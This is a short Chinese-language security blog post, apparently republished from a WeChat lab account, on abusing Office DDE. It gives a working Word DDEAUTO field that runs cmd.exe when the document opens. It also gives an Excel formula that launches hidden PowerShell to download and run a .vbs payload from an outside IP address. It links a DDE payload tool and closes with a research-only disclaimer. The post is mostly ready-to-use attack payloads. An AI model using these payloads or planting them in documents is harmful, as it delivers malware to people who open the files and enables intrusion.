DDE技术是指动态数据交换技术,它是一种在应用程序之间传输数据的方法。DDE协议是一组消息和准则,它在共享数据的应用程序之间发送消息,并使用共享内存在应用程序之间交换数据。应用程序可以使用DDE协议进行一次性数据传输和持续交换,在这种交换中,当新数据可用时,应用程序会相互发送更新。
Word
在Word文档中,可以使用DDE技术来插入字段代码,从而实现从其他应用程序(如Excel)获取数据或执行命令的功能。
首先打开Word文档,选择”插入”功能区块,点击”文档部件”——”域”在弹出的窗口中点击确定:
可以看到添加了一个”!异常的公式结尾”字样,右键选择”切换域代码”,将显示代码字样:
将代码修改为如下:
{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"}
保存文档并重新打开,会弹出两个弹窗,只需要选择”是”,即可弹出计算器窗口。
Excel
对于Excel来说,就比较简单了,只需要注入(本例为A1单元格)以下公式即可完成Payload交付:
=cmd|'/c cmd.exe /c powershell.exe -nop -w hidden iwr -outf %tmp%\msf.vbs http://192.168.8.145/msf.vbs & %tmp%\msf.vbs'!'A1'
工具
Office-DDE-Payloads
https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads
- END -
原文始发于微信公众号(Ghost Wolf Lab):DDE
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论